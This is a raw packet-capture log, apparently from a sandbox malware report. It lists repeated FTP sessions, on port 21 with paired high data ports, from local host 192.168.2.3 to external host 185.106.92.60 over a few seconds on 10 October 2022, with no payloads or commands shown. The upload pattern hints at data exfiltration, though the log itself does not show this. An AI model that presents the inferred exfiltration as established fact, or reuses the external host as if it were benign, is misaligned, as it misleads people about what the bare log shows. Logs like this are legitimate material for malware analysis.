                                                                                                                                    Oct 10, 2022 06:03:20.127429962 CEST6466149956185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.127537012 CEST4995664661192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.130315065 CEST2149955185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.130522013 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.130626917 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.157059908 CEST2149955185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.157260895 CEST2149955185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.157402039 CEST4995521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.299988985 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.323241949 CEST2149957185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.323434114 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.380497932 CEST2149957185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.380615950 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.380867958 CEST2149957185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.380986929 CEST2149957185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.380990982 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.381036997 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.381191015 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.404274940 CEST2149957185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.404577017 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.407731056 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.430943966 CEST2149957185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.431088924 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.431474924 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.454602957 CEST2149957185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.454967976 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.459598064 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.483139038 CEST2149957185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.483288050 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.504008055 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.527203083 CEST2149957185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.527364969 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.533199072 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.556648016 CEST2149957185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.556740999 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.560748100 CEST4995864662192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.585604906 CEST6466249958185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.585726976 CEST4995864662192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.592905045 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.616554976 CEST2149957185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.616652012 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.617192030 CEST4995864662192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.642493963 CEST6466249958185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.642575979 CEST6466249958185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.642704964 CEST4995864662192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.643501997 CEST2149957185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.643625975 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.643759966 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.666660070 CEST2149957185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.666692972 CEST2149957185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.666786909 CEST4995721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.966386080 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:20.990359068 CEST2149959185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:20.990488052 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.018758059 CEST2149959185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.018790960 CEST2149959185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.018922091 CEST2149959185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.018928051 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.018965960 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.031961918 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.064707041 CEST2149959185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.066163063 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.066348076 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.092487097 CEST2149959185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.092596054 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.099139929 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.123830080 CEST2149959185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.123949051 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.141210079 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.167680025 CEST2149959185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.167768955 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.168256044 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.196789026 CEST2149959185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.196918964 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.197956085 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.222233057 CEST2149959185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.226836920 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.227242947 CEST4996064663192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.250905991 CEST6466349960185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.251010895 CEST4996064663192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.251303911 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.275374889 CEST2149959185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.276352882 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.276911974 CEST4996064663192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.300196886 CEST2149959185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.301029921 CEST6466349960185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.301139116 CEST6466349960185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.301165104 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.301224947 CEST4996064663192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.301395893 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.324826002 CEST2149959185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.324886084 CEST2149959185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.325032949 CEST4995921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.496396065 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.519437075 CEST2149961185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.519531012 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.545850039 CEST2149961185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.545878887 CEST2149961185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.545892954 CEST2149961185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.545983076 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.546175003 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.569323063 CEST2149961185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.572406054 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.572568893 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.595839024 CEST2149961185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.599101067 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.599280119 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.622176886 CEST2149961185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.622414112 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.622710943 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.646047115 CEST2149961185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.646267891 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.646760941 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.670147896 CEST2149961185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.670326948 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.684065104 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.707679033 CEST2149961185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.707798004 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.708028078 CEST4996264665192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.731628895 CEST6466549962185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.731724024 CEST4996264665192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.732048988 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.756220102 CEST2149961185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.756458044 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.757059097 CEST4996264665192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.780564070 CEST6466549962185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.780600071 CEST6466549962185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.780764103 CEST4996264665192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.781829119 CEST2149961185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.781912088 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.785914898 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.808967113 CEST2149961185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.809091091 CEST2149961185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.809165001 CEST4996121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.952857018 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:21.979895115 CEST2149963185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:21.980077982 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.008210897 CEST2149963185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.008248091 CEST2149963185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.008385897 CEST2149963185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.008464098 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.008464098 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.008670092 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.033430099 CEST2149963185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.033628941 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.033741951 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.059118032 CEST2149963185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.059288025 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.059449911 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.083206892 CEST2149963185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.083513021 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.083642006 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.107882023 CEST2149963185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.108114958 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.108763933 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.132348061 CEST2149963185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.132658958 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.133613110 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.157696962 CEST2149963185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.158065081 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.158430099 CEST4996464666192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.182925940 CEST6466649964185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.183145046 CEST4996464666192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.183754921 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.208904982 CEST2149963185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.209112883 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.210087061 CEST4996464666192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.234323025 CEST6466649964185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.234577894 CEST6466649964185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.234668016 CEST4996464666192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.234708071 CEST2149963185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.234817028 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.239367008 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.263603926 CEST2149963185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.263637066 CEST2149963185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.263720036 CEST4996321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.379724979 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.402374029 CEST2149965185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.402617931 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.428880930 CEST2149965185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.429079056 CEST2149965185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.429146051 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.429430962 CEST2149965185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.429471016 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.429511070 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.429596901 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.452476025 CEST2149965185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.452692032 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.452750921 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.475697041 CEST2149965185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.475939989 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.476151943 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.499347925 CEST2149965185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.499471903 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.499890089 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.523119926 CEST2149965185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.523444891 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.524233103 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.547245979 CEST2149965185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.547514915 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.549375057 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.572660923 CEST2149965185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.572932005 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.573314905 CEST4996664667192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.596290112 CEST6466749966185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.596463919 CEST4996664667192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.596682072 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.620729923 CEST2149965185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.621081114 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.621953011 CEST4996664667192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.644833088 CEST6466749966185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.644881964 CEST2149965185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.644912958 CEST6466749966185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.645066023 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.645296097 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.645314932 CEST4996664667192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.667804956 CEST2149965185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.667859077 CEST2149965185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.668016911 CEST4996521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.797822952 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.823225975 CEST2149967185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.823343992 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.851182938 CEST2149967185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.851329088 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.851449013 CEST2149967185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.851500988 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.851577997 CEST2149967185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.851618052 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.851713896 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.876883030 CEST2149967185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.877068996 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.877226114 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.902735949 CEST2149967185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.902863979 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.903103113 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.929188967 CEST2149967185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.929286957 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.929522038 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.955235004 CEST2149967185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.955466986 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.956274033 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.980508089 CEST2149967185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:22.980680943 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:22.981672049 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.010521889 CEST2149967185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.010731936 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.015678883 CEST4996864668192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.041887045 CEST6466849968185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.042052984 CEST4996864668192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.042387962 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.107868910 CEST2149967185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.108069897 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.115885019 CEST4996864668192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.139662027 CEST6466849968185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.139813900 CEST6466849968185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.139993906 CEST4996864668192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.140248060 CEST2149967185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.140403986 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.140661955 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.165219069 CEST2149967185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.165268898 CEST2149967185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.165457964 CEST4996721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.282716036 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.310188055 CEST2149969185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.310383081 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.341849089 CEST2149969185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.341928005 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.341934919 CEST2149969185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.341983080 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.342231989 CEST2149969185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.342283010 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.559374094 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.586076975 CEST2149969185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.586378098 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.629165888 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.657260895 CEST2149969185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.657351971 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.703775883 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.729235888 CEST2149969185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.729367018 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.730823994 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.758084059 CEST2149969185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.758225918 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.760430098 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.786113977 CEST2149969185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.786314011 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.819411993 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.845802069 CEST2149969185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.845900059 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.847887993 CEST4997064670192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.874089956 CEST6467049970185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.874320030 CEST4997064670192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.902942896 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.928951025 CEST2149969185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.929073095 CEST4996921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.931149960 CEST4997064670192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:23.956810951 CEST6467049970185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:23.956933022 CEST6467049970185.106.92.60192.168.2.3
